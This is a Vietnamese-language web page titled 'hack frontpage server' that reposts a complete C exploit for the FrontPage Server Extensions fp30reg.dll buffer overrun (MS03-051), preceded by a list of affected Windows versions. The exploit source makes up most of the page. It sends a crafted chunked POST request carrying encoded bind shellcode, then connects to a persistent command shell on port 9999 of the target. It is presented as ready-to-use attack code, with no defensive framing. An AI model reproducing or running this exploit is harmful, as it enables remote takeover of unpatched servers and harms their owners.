hack frontpage server

Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerability (MS03-051)

Phiên bản ảnh hưởng (vulnerable):
Microsoft FrontPage Server Extensions 2000
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Advanced Server SP3
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Datacenter Server SP3
+ Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional SP2
+ Microsoft Windows 2000 Professional SP3
+ Microsoft Windows 2000 Server
+ Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server SP2
+ Microsoft Windows 2000 Server SP3
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home SP1
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional SP1
Microsoft FrontPage Server Extensions 2002
Microsoft SharePoint Team Services 2002
+ Microsoft Office XP SP1
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP Home SP1
Microsoft Windows XP Professional SP1

2.
Code khai thác :complite with winshock.h và vài thủ thuật nhỏ/*******************************************************************************Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett MooreExploit by Adik < netmaniac [at] hotmail.kg >Binds persistent command shell on port 9999Tested on Windows 2000 Professional SP3 English version (fp30reg.dll ver 4.0.2.5526) Greetingz/Salamchiki: fellaz in Bishkek - r0ach,acha,horsemoon :)-[ 13/Nov/2003 ]-********************************************************************************/#include <stdio.h>#include <string.h>#include <winsock.h>#pragma comment(lib,"ws2_32")#define VER "0.1" /******** bind shellcode spawns persistent shell on port 9999 *****************************/unsigned char kyrgyz_bind_code[] = {0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 0x88, 
0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88};void cmdshell (int sock);long gimmeip(char *hostname);int main(int argc,char *argv[]){ WSADATA wsaData;struct sockaddr_in targetTCP;struct hostent *host;int sockTCP,s; unsigned short port = 80;long ip;unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";unsigned char packet[3000],data[1500]; 
unsigned char ecx[] = "\xe0\xf3\xd4\x67";unsigned char edi[] = "\xff\xd0\x90\x90"; unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dllunsigned char shortjmp[] = "\xeb\x10";printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"" by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER);if(argc < 2){printf(" Usage: %s [Target] <port>\n"" eg: fp30reg.exe 192.168.63.130\n\n",argv[0]);return 1; } if(argc==3)port = atoi(argv[2]); WSAStartup(0x0202, &wsaData); printf("[*] Target:\t%s \tPort: %d\n\n",argv[1],port);ip=gimmeip(argv[1]); memset(&targetTCP, 0, sizeof(targetTCP));memset(packet,0,sizeof(packet));targetTCP.sin_family = AF_INET;targetTCP.sin_addr.s_addr = ip;targetTCP.sin_port = htons(port); sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]); memset(data, 0x90, sizeof(data)-1);data[sizeof(data)-1] = '\x0';memcpy(&data[16],edi,sizeof(edi)-1);memcpy(&data[20],ecx,sizeof(ecx)-1); memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);memcpy(&data[250+14],call,sizeof(call)-1); memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data); if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){printf("[x] Socket not initialized! Exiting .\n");WSACleanup();return 1;}printf("[*] Socket initialized .\n"); if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){printf("[*] Connection to host failed! Exiting .\n");WSACleanup();exit(1);} printf("[*] Checking for presence of fp30reg.dll .");if (send(sockTCP, packet, strlen(packet),0) == -1){printf("[x] Failed to inject packet! Exiting .\n");WSACleanup();return 1;} memset(packet,0,sizeof(packet)); if (recv(sockTCP, packet, sizeof(packet),0) == -1) {printf("[x] Failed to receive packet! 
Exiting .\n");WSACleanup();return 1;} if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')printf(" Found!\n");else{printf(" Not Found!! Exiting .\n");WSACleanup();return 1;}printf("[*] Packet injected!\n");closesocket(sockTCP);printf("[*] Sleeping ");for(s=0;s<13000;s+=1000){printf(". ");Sleep(1000);} printf("\n[*] Connecting to host: %s on port 9999",argv[1]);if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){printf("\n[x] Socket not initialized! Exiting .\n");WSACleanup();return 1;} targetTCP.sin_family = AF_INET;targetTCP.sin_addr.s_addr = ip;targetTCP.sin_port = htons(9999);if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){printf("\n[x] Exploit failed or there is a Firewall! Exiting .\n");WSACleanup();exit(1);} printf("\n[*] Dropping to shell .\n\n");cmdshell(sockTCP);return 0;}/*********************************************************************************/void cmdshell (int sock){struct timeval tv;int length;unsigned long o[2];char buffer[1000];tv.tv_sec = 1;tv.tv_usec = 0;while (1) {o[0] = 1;o[1] = sock; length = select (0, (fd_set *)&o, NULL, NULL, &tv);if(length == 1) {length = recv (sock, buffer, sizeof (buffer), 0);if (length <= 0) {printf ("[x] Connection closed.\n");WSACleanup();return;}length = write (1, buffer, length);if (length <= 0) {printf ("[x] Connection closed.\n");WSACleanup();return;}}else{length = read (0, buffer, sizeof (buffer));if (length <= 0) {printf("[x] Connection closed.\n");WSACleanup();return;}length = send(sock, buffer, length, 0);if (length <= 0) {printf("[x] Connection closed.\n");WSACleanup();return;}}}}/*********************************************************************************/long gimmeip(char *hostname) {struct hostent *he;long ipaddr;if ((ipaddr = inet_addr(hostname)) < 0) {if ((he = gethostbyname(hostname)) == NULL) {printf("[x] Failed to resolve host: %s! 
Exiting .\n\n",hostname);WSACleanup();exit(1);}memcpy(&ipaddr, he->h_addr, he->h_length);} return ipaddr;}/*********************************************************************************/ . Microsoft FrontPage Server Extensions Remote Debug Buffer Overrun Vulnerabilitytrang này đã được đọc lần Phiên bản ảnh hưởng:vulnerable Microsoft FrontPage Server. 2000 Advanced Server + Microsoft Windows 2000 Advanced Server SP1+ Microsoft Windows 2000 Advanced Server SP2+ Microsoft Windows 2000 Advanced Server SP3+

Ngày đăng: 02/11/2012, 14:18
